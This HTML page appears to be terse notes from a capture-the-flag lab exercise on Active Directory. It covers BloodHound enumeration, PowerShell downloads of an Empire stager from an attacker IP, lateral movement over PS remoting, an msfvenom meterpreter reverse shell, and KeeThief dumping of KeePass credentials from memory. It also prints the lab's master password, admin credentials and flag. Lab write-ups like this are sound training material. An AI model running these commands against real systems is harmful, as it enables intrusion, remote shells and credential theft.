<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>5 flag</title>
</head><body>install bloodhound and neo4j db for enumeration,<br/>
<br/>
upload the bloodhound script and execute,<br/>
<br/>
powershell -command "&amp; { iwr http://10.10.14.83/emp.bat -OutFile empire_new.bat}" &nbsp; &nbsp;or use meterpreter upload<br/>
<br/>
powershell -ep bypass<br/>
<br/>
ipmo ./SharpHound.ps1; Invoke-BloodHound<br/>
<br/>
<img src="screenshot.png" /><br/>
<br/>
import the data into bloodhound and found ngodfrey user has session on ws05,<br/>
<br/>
<img src="screenshot 2.png" /><br/>
<br/>
use empire to create listener and stager and get agent from ws04,<br/>
<br/>
stager can be - launcher/bat or dll<br/>
can be used only port 80 and 443 [bcoz of firewall ] <br/>
<br/>
transfer the bat file to ws04 and execute to get shell<br/>
powershell -command "&amp; { iwr http://10.10.14.83:8080/emp.bat -OutFile empire_new.bat}"<br/>
<br/>
usemodule lateral_movement/invoke_psremoting -----&gt; to get shell on ws05<br/>
execute and get empire shell on ws05<br/>
<br/>
<img src="screenshot 3.png" /><br/>
<br/>
then create a psh script and execute via empire to get msf shell <br/>
<br/>
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.14.83 lport=443 -f psh -o meter.ps1<br/>
<br/>
then use, usemodule management/invoke_script to execute script and get shell on meterpreter<br/>
<br/>
<img src="screenshot 4.png" /><br/>
<br/>
Will get msf shell,<br/>
<br/>
on further enumeration on ws05 <br/>
found keepass 2 is installed, and then it is triggered at random [ 1-30 mins ], <br/>
keethief.ps1 can be used to grab the credentials from memory<br/>
<br/>
Reference - http://www.harmj0y.net/blog/redteaming/keethief-a-case-study-in-attacking-keepass-part-2/<br/>
<br/>
wrote a ps script, to monitor the keepass process, when the process starts, keethief.ps1 script should get execute to dump creds<br/>
<br/>
./test.ps1 -ProcessName KeePass -FilePath "c:\Program Files (x86)\KeePass Password Safe 2\"<br/>
<br/>
<img src="screenshot 5.png" /><br/>
<br/>
<br/>
plaintext masterpassword - 1234567890qwertyuiopasdfghjklzxcvbnm!"£$%^&amp;*()<br/>
<br/>
use the master password and key file to open the keepass database....<br/>
<br/>
found creds,<br/>
username - ngodfrey_adm<br/>
password - J5KCwKruINyCJBKd1dZU<br/>
<br/>
Found the flag in recycle bin....<br/>
<br/>
RASTA{n07h1n6_15_54f3}<br/>
<br/>
</body></html>